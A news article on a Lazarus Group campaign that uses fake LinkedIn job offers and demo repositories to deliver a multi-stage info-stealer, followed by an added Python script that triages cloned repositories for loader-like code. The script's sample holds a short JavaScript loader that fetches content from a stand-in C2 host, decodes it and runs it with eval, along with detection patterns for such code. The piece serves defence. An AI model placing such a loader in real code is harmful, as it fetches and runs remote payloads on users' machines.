
Cybercriminals pose as recruiters on LinkedIn to deploy info stealer

North Korean cybercriminal Lazarus Group is exploiting LinkedIn’s professional networking environment to execute sophisticated malware attacks disguised as job recruitment campaigns. A newly discovered operation has revealed that attackers use fake job offers to lure professionals into downloading malicious code, ultimately compromising their credentials and exfiltrating sensitive data.

Researchers discovered that the attack initiates with fraudulent job offers, often for roles in cryptocurrency, finance, or travel-related projects. Victims are enticed by the flexibility of remote work and a competitive offer. Once the target expresses interest, the attacker requests a CV or a GitHub repository link, which can be used both to gather intelligence on the target and to add legitimacy to the interaction.

Following initial contact, the attacker provides a repository containing a ‘minimum viable product’ (MVP) and a document with technical questions requiring running the demo code. While the code appears legitimate initially, it contains obfuscated scripts designed to load and execute malicious software from a remote server.

[Image: Malicious code sent by North Korean cyber crooks. | Source: Bitdefender]

The deployed malware is a sophisticated cross-platform info-stealer capable of infiltrating Windows, macOS, and Linux systems. It targets cryptocurrency wallets and browser extensions, harvesting login credentials, session data, and sensitive files. The stolen data is then transmitted to a malicious command-and-control (C2) server.

The attack unfolds in multiple stages. Initially, a JavaScript-based info-stealer scans browser extensions for crypto wallets while exfiltrating login credentials and browsing data. A Python script is then executed, setting the stage for further exploits. Attackers also deploy additional Python modules to monitor keyboard inputs and clipboard activity, collect system data, and extract login and payment details from multiple browsers.

[Image: Fake evaluation form used by Lazarus Group to gain legitimacy. | Source: Bitdefender]

As the final payload, a .NET-based malware package is installed to bypass Microsoft Defender protections, set up a Tor proxy server for covert communication, deploy a crypto-miner that exploits system resources, run a keylogger to capture user credentials, and steal classified files and personal data.

The Lazarus Group uses multiple programming languages, along with several techniques that let the malware evade detection and maintain persistence.

Researchers have cautioned users to refrain from engaging with suspicious job offers that lack a description. Users should also check the company's official postings to verify the offer. On LinkedIn and other social media, users should also visit the profile of the person who posted the job offer: for these attacks, the threat actors usually create a new profile with little background activity.

Users should not engage with recruiters who do not use their official company email or exhibit inconsistent language skills.

“It is ideal to never execute any foreign source code on enterprise devices, and to use Virtual Machines, sandboxes or various online platforms when doing so on personal computers. Even though this would add some overhead to the process, it would prevent any personal information from being leaked and used with malicious intent in the future,” researchers concluded.
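The repository in this campaign carried demo code that looked legitimate but contained obfuscated scripts to fetch and run a remote payload, and the researchers' advice is to never execute such foreign code directly. The following added example (not Bitdefender's tooling or the article's own code) is a pre-execution triage script a defender could run over a cloned "take-home" repository before anyone executes it: it flags files where a way to obtain code (network fetch, base64 decode, a long embedded blob) co-occurs with a way to run it (dynamic eval, child process). The indicator patterns and both sample snippets are constructed assumptions, not signatures from the report.

```python
"""Pre-execution triage of a 'take-home' repository: flag files that fetch, decode and run code."""
import re
from pathlib import Path
from typing import Dict, List, Tuple
# Heuristic indicators (assumed, not Bitdefender's signatures): a staged loader needs
# a way to obtain code (network, base64, embedded blob) and a way to execute it.
INDICATORS: Dict[str, re.Pattern] = {
    "dynamic_eval": re.compile(r"\b(eval|new\s+Function)\s*\("),
    "remote_fetch": re.compile(r"require\(['\"]https?['\"]\)|\b(axios|fetch|urllib|requests)\b"),
    "child_process": re.compile(r"\b(child_process|subprocess|os\.system|spawn\()"),
    "base64_decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\batob\(|b64decode\("),
    "long_encoded_blob": re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]"),
}
OBTAIN = {"remote_fetch", "base64_decode", "long_encoded_blob"}
EXECUTE = {"dynamic_eval", "child_process"}
SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py"}

def scan_source(text: str) -> List[str]:
    """Names of every indicator present in one file's text."""
    return [name for name, pat in INDICATORS.items() if pat.search(text)]

def risk_level(hits: List[str]) -> str:
    """'high' only when an obtain-indicator and an execute-indicator co-occur."""
    found = set(hits)
    if found & OBTAIN and found & EXECUTE:
        return "high"
    return "medium" if found else "clean"

def scan_repo(root: Path) -> Dict[str, Tuple[str, List[str]]]:
    """Map each flagged file under root (relative path) to its (risk, hits)."""
    report: Dict[str, Tuple[str, List[str]]] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix in SOURCE_SUFFIXES:
            hits = scan_source(path.read_text(errors="ignore"))
            if hits:
                report[str(path.relative_to(root))] = (risk_level(hits), hits)
    return report

# Constructed samples: a loader-style snippet and an ordinary Express app (both hypothetical).
SUSPICIOUS_SAMPLE = r"""const h = require("https");
const run = (s) => eval(Buffer.from(s, "base64").toString());
h.get("https://c2.example.invalid/cfg", r => { let d = ""; r.on("data", c => d += c); r.on("end", () => run(d)); });"""
BENIGN_SAMPLE = """const app = require("express")();
app.get("/health", (req, res) => res.json({ ok: true }));
app.listen(3000);"""

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(f"{label}: {risk_level(scan_source(sample))}")
```

A "high" result is a reason to open the file in a sandbox, not proof of malice; the heuristics will also flag legitimate build scripts, so treat the output as a triage list.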

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me